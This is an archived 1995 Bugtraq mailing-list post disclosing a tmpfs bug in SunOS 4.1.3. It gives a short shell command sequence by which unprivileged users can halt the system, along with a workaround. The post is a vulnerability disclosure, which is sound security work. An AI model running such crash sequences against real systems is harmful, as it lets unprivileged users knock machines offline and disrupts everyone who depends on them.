[2439] in bugtraq
Another tmpfs bug in SunOS 4
daemon@ATHENA.MIT.EDU (Arfst Ludwig)
Thu Dec 7 19:21:02 1995
Date: Sat, 2 Dec 1995 23:50:40 +0100
Reply-To: Bugtraq List <BUGTRAQ@CRIMELAB.COM>
From: Arfst Ludwig <Arfst.Ludwig@luxor.in-berlin.de>
X-To: BUGTRAQ@CRIMELAB.COM
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@CRIMELAB.COM>
Hi!
Unprivileged users can crash the system such
that a power down power up cyle is needed.
Vulnerable OS is (at least) SunOS 4.1.3.
With the right permissions (umask) the following
sequence crahes the system. The kernel does not
panic, nor the abort sequece enters the boot
promt, the system is halted, need to power down.
8<------------------------- cut here -------------------------
user1> cd /tmp
user1> mkdir foo
user1> su user2
user2> mkdir foo/bar
user2> touch foo/bar/{plop,blup}
user2> exit
user1> cd foo
user1> mv bar ..
8<------------------------- cut here -------------------------
/tmp's permissons are drwxrwxrwt root wheel
I have not explored this bug very much because of the
ungracefully consequences.
Workaround:
Avoid using (the marvelous) TMPFS filesystems :-(
or (IMHO even worse) switch to Solaris 2 ?
Cheers, Arfst
______________________________________________________________________
__
(00) Arfst Ludwig
\`\/ E-Mail: Arfst.Ludwig@luxor.in-berlin.de
"" carpe diem
